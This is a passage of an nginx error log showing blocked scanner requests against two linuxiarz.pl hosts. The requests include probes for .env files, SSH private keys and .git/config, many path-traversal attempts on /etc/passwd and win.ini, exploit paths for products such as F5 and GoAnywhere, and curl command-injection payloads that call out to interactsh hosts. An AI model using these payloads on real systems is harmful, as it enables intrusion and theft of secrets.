13:46:13 [error] 3658523#3658523: *409403 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:13 [error] 3658523#3658523: *409404 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:46:18 [error] 3658523#3658523: *409413 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:47:44 [error] 3658523#3658523: *409597 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /misc/%60curl$%7BIFS%7Dd40bkpqkh8bsumo1dbv0u93raf8t18rmh.interactsh.lab.cert.pl%60/..;/index.html HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:47:58 [error] 3658523#3658523: *409628 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/10/28 13:52:09 [error] 3658523#3658523: *410203 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:52:25 [error] 3658523#3658523: *410255 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:52:37 [error] 3658523#3658523: *410281 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 13:56:12 [error] 3658523#3658523: *410778 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 14:02:00 [error] 3658523#3658523: *411504 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.clean.sh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/28 14:02:10 [error] 3658523#3658523: *411522 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/30 16:16:16 [error] 3658523#3658523: *747426 access forbidden by rule, client: 34.42.228.152, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/30 20:03:42 [error] 3658523#3658523: *769927 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.axiom/accounts/do.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:19:12 [error] 3658523#3658523: *771534 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.axiom/accounts/do.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:34 [error] 3658523#3658523: *772601 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772603 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772604 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772605 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772608 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772609 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:32:35 [error] 3658523#3658523: *772611 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:51 [error] 3658523#3658523: *772849 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:54 [error] 3658523#3658523: *772852 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:54 [error] 3658523#3658523: *772853 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:54 [error] 3658523#3658523: *772854 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:54 [error] 3658523#3658523: *772855 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772856 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772857 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772858 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772859 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772860 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772861 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772862 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:55 [error] 3658523#3658523: *772863 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772864 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772865 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772866 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772867 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772868 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772869 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772870 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:56 [error] 3658523#3658523: *772871 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:34:57 [error] 3658523#3658523: *772872 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:48:12 [error] 3658523#3658523: *774479 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /render/public/..%252f%255Cd41rvtn7ndisgvqp7k7ggwikckmiruqcz.interactsh.lab.cert.pl%252f%253F%252f..%252f.. HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:49:53 [error] 3658523#3658523: *774632 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:42 [error] 3658523#3658523: *774812 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:42 [error] 3658523#3658523: *774813 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:42 [error] 3658523#3658523: *774814 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:42 [error] 3658523#3658523: *774815 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:42 [error] 3658523#3658523: *774816 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774817 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774818 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774819 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774820 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774821 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:51:43 [error] 3658523#3658523: *774822 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:55:03 [error] 3658523#3658523: *775183 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 20:58:03 [error] 3658523#3658523: *775477 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:58 [error] 3658523#3658523: *776509 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:58 [error] 3658523#3658523: *776510 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:58 [error] 3658523#3658523: *776511 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:58 [error] 3658523#3658523: *776512 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:58 [error] 3658523#3658523: *776513 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776514 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776515 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776516 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776518 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776519 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776520 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776521 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:10:59 [error] 3658523#3658523: *776522 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776523 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776526 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776527 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658522#3658522: *776528 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776530 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776531 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776532 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:00 [error] 3658523#3658523: *776533 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:11:01 [error] 3658523#3658523: *776534 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:18:48 [error] 3658523#3658523: *777151 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /misc/%60curl$%7BIFS%7Dd41s7rn7ndisgsnk74a0sq48mcanar9ep.interactsh.lab.cert.pl%60/..;/index.html HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:20:38 [error] 3658523#3658523: *777272 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:23:23 [error] 3658523#3658523: *777470 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:26:38 [error] 3658523#3658523: *777712 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:27:20 [error] 3658523#3658523: *777764 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:31:27 [error] 3658523#3658523: *778104 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:37:46 [error] 3658523#3658523: *778719 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:38:41 [error] 3658523#3658523: *778811 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:40:45 [error] 3658523#3658523: *779054 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/10/30 21:45:00 [error] 3658523#3658523: *779386 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:47:49 [error] 3658523#3658523: *779672 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:48:50 [error] 3658523#3658523: *779776 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:51:51 [error] 3658523#3658523: *780114 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 21:54:03 [error] 3658523#3658523: *780323 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:14 [error] 3658523#3658523: *781677 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:14 [error] 3658523#3658523: *781680 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781681 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781682 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781683 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781684 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781685 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781686 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781688 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:15 [error] 3658523#3658523: *781689 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781690 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781691 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781692 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781693 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781695 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781698 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:16 [error] 3658523#3658523: *781700 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:17 [error] 3658523#3658523: *781702 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:08:17 [error] 3658523#3658523: *781703 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:14:48 [error] 3658523#3658523: *782414 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:17:09 [error] 3658523#3658523: *782757 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:17:16 [error] 3658523#3658523: *782769 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:19:25 [error] 3658523#3658523: *783190 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:28:42 [error] 3658523#3658523: *784083 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.auth.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:29:09 [error] 3658523#3658523: *784154 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:34:08 [error] 3658523#3658523: *784572 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:34:47 [error] 3658523#3658523: *784609 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:38:29 [error] 3658523#3658523: *784899 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/10/30 22:41:39 [error] 3658523#3658523: *785180 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/10/30 22:51:43 [error] 3658523#3658523: *786108 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.clean.sh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:52:38 [error] 3658523#3658523: *786177 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:58:17 [error] 3658522#3658522: *786736 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 22:59:22 [error] 3658523#3658523: *786830 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:01:28 [error] 3658523#3658523: *786996 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/30 23:03:58 [error] 3658523#3658523: *787174 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET 